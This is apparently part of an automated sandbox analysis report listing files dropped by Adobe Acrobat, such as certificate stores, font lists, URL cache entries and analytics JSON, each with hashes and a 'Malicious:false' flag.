                                                                                            Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                            Category:dropped
                                                                                            Size (bytes):71954
                                                                                            Entropy (8bit):7.996617769952133
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                            Malicious:false
                                                                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):192
                                                                                            Entropy (8bit):2.7425532007658724
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:kkFklu54l/tfllXlE/HT8kc/ltNNX8RolJuRdxLlGB9lQRYwpDdt:kK3OteT8dVNMa8RdWBwRd
                                                                                            MD5:C2905B9C4B32D5120D13823A3C819F54
                                                                                            SHA1:DA5B5B46633BC647BDBDA55EEB59975B4587F9E6
                                                                                            SHA-256:EF189F51D5C2E8C954F4FC541D90CE7B0D9E130038D0AFB6C982D19E3B871B9B
                                                                                            SHA-512:48254D8D2FAF524687BF76B969D0781BCB6255D5E93067E45AE707BB729C21413F5240CE98429B5FF0C08C469BD9D053D9812CE4674AC48E52F73456D433232E
                                                                                            Malicious:false
                                                                                            Preview:p...... ...........G5..(....................................................... ..........W....3d..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):328
                                                                                            Entropy (8bit):3.1209352938804273
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kKviL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:niiDnLNkPlE99SNxAhUe/3
                                                                                            MD5:9A9F0BCF817B6963C33CB9C18FA24C62
                                                                                            SHA1:F570FBDACD6149E534882328B134B0D1CCA0C15F
                                                                                            SHA-256:0802B5F625061FA26C6AB817B9D3863DD02708BD8F566D166721528317DF76BD
                                                                                            SHA-512:E07C3B3F430BD7F4CCBA70E300028B413A6EDD38D8754BC0018EE597431AEC77610D875B2865B2F7C02ADB0E2C865EF383BACB13B78EFD3A1AE54CA1662533FD
                                                                                            Malicious:false
                                                                                            Preview:p...... ........r'..G5..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):1233
                                                                                            Entropy (8bit):5.233980037532449
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                            MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                            SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                            SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                            SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                            Malicious:false
                                                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):1233
                                                                                            Entropy (8bit):5.233980037532449
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                            MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                            SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                            SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                            SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                            Malicious:false
                                                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):1233
                                                                                            Entropy (8bit):5.233980037532449
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                            MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                            SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                            SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                            SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                            Malicious:false
                                                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):10880
                                                                                            Entropy (8bit):5.214360287289079
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                            MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                            SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                            SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                            SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                            Malicious:false
                                                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:PostScript document text
                                                                                            Category:dropped
                                                                                            Size (bytes):10880
                                                                                            Entropy (8bit):5.214360287289079
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                            MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                            SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                            SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                            SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                            Malicious:false
                                                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):295
                                                                                            Entropy (8bit):5.371102448733174
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXcgBPV0nZiQ0YWieoAvJM3g98kUwPeUkwRe9:YvXKXj5V0cziVGMbLUkee9
                                                                                            MD5:50E18CDA5EF1F52C8784D72E2D1B3C9E
                                                                                            SHA1:3A0690F58B2D571921D4DDDDE0FD95C99DC83ABE
                                                                                            SHA-256:402D951BFD75D3A940E8C6A2F24760AC8B62165B17AC1169991DEE721BDEFA0C
                                                                                            SHA-512:384D51C7028A164A06AC7ACC091460C0AC559D67B1EACCA798BBDC2FAC5089C6C5B0EA54D45B21B773186E4BA2DBC2B0A50790B5E8F783996DA2D0C0B20745B4
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):294
                                                                                            Entropy (8bit):5.323355216639535
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXcgBPV0nZiQ0YWieoAvJfBoTfXpnrPeUkwRe9:YvXKXj5V0cziVGWTfXcUkee9
                                                                                            MD5:94978296CEF5A10645E7FA054C76890A
                                                                                            SHA1:3FC6950DA9DE27DCF051032F3BA2B7EAC9E88CC1
                                                                                            SHA-256:168483400009F97F0DF4F9D5A3C69AE55D61E8B0C38E739BE9DAFFEBEB1BC2AB
                                                                                            SHA-512:F40F0145A54022BD31EBC7F8B8CFAF20DF603AF7F296C9E15E430C12459D1F267C393FF9A3C556A69658047F4D689F1D5ED57AE8D3285579CCA93B4BE7E59489
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):294
                                                                                            Entropy (8bit):5.301307816638895
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXcgBPV0nZiQ0YWieoAvJfBD2G6UpnrPeUkwRe9:YvXKXj5V0cziVGR22cUkee9
                                                                                            MD5:C6E4715768FEB5BECF4AA5D35E8D368A
                                                                                            SHA1:C2C340699970D83A19786F76CC0C195C666222F6
                                                                                            SHA-256:7ED76CBC2D0633105B2D714C5D3E1FD55357FA6799BCAED07C1085845C777965
                                                                                            SHA-512:4DCE2FA43F57602EC3FA7A916ADCF7D935F9438E1EFF967BA4BBD9FF9E01B771433B5F7F7BA84E633A5A582D815219D0F7F36BD92F4B5296B5CD18B9C675523F
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):285
                                                                                            Entropy (8bit):5.351396570446795
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXcgBPV0nZiQ0YWieoAvJfPmwrPeUkwRe9:YvXKXj5V0cziVGH56Ukee9
                                                                                            MD5:C336246111073B3FA9CF9D6C3FD77899
                                                                                            SHA1:B65955CB0409BFB79642F8E657504EF12A1BB6A3
                                                                                            SHA-256:57760792689F4DDEB9A7AA50B251774DBABF212EAC4747E5B7FB6ABBC112205A
                                                                                            SHA-512:271983E0A98853C18C052B1B7200955744252AEC67CB57E682AA6AC546A7DBB2759A2500A51DA59073F9465A539EB042F62702A2DED99A1B66ABFABAD52D3451
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):1123
                                                                                            Entropy (8bit):5.6929482945298755
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Yv6X97m6pLgE9cQx8LennAvzBvkn0RCmK8czOCCSm:YvQLhgy6SAFv5Ah8cv/m
                                                                                            MD5:ED0C4A2CF5EBA0438EF01582165F869D
                                                                                            SHA1:843CB89F58333CBBB0215D66740815985D352A4A
                                                                                            SHA-256:ED9E9A5BFD5523A2F3F1771737C5E70EB2E0ADEE8C38EFA4900EE928010E6D12
                                                                                            SHA-512:C017FB6137A0131427DAFAFE321D40557175BB49CF38112EF2731C45914C4AAA7CBD66E93FE8F6DF209A1BED6156D1F516F8B5D7A76BED649094CEB9F58A36F7
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):1122
                                                                                            Entropy (8bit):5.684725928299812
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Yv6X97mcVLgEwcp06ybnAvz7xHn0RCmK8czOCYHfl8zdBP:YvQnFgSNycJUAh8cvYHA
                                                                                            MD5:489A1E61F4F5F29144969CFAB4ADE977
                                                                                            SHA1:4D6CE269062B623AF0B2B73DD5F93B57B146CEC7
                                                                                            SHA-256:5CDF6484D7330EBE71F6B7A3902AB031813F3EBD9B7DD871306C1F380FE12F17
                                                                                            SHA-512:C5EA03B6B644DA92B0CCAD93ACB41E74B8A6A94D7C8B69AD0779F879CC3B7D31762E2646E8E2D4278D99233C3F144E234C13E30D928F0727C5C51552ECF476C5
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):5.306835516014882
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXcgBPV0nZiQ0YWieoAvJfQ1rPeUkwRe9:YvXKXj5V0cziVGY16Ukee9
                                                                                            MD5:384AB124E0867AD941D9F599C3F3B171
                                                                                            SHA1:84B17C39E6BBDA045D568CBD8DA20B87BB4AFB89
                                                                                            SHA-256:02DF5B628423268003B7C0A673653E6452D9FD68612B4A17648447A987EBC81D
                                                                                            SHA-512:58D717AD73ADFC7EB2CFA581FE225652B4F4FDE224AD1E735CFA4EA9D6BC92E4F5850BDAEB5CC3BF6B79D7CF41D43DFF18D16971825A60C3146F18830E244DF3
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):1102
                                                                                            Entropy (8bit):5.6766434478130305
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Yv6X97mB2LgErcXWl7y0nAvzIBcSJCBViVP:YvQWogH47yfkB5kVm
                                                                                            MD5:C59B092153F1F55AED985CF558D7F907
                                                                                            SHA1:6F0B64F19B6F9FF6A4090C18890D1A1F84F1A3B5
                                                                                            SHA-256:7223C9B0E5540FCBB89EC249FF4B3B3BE0CC248972143A2A1D00090D294D0AED
                                                                                            SHA-512:5488B9B284717CF37A13B25BCD399F0882F4664B46F378BFD5E8D060599BE9AD3FE5BE947CAA867157FA3BA1900657C4362129587273FD5836521215081C2E9A
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
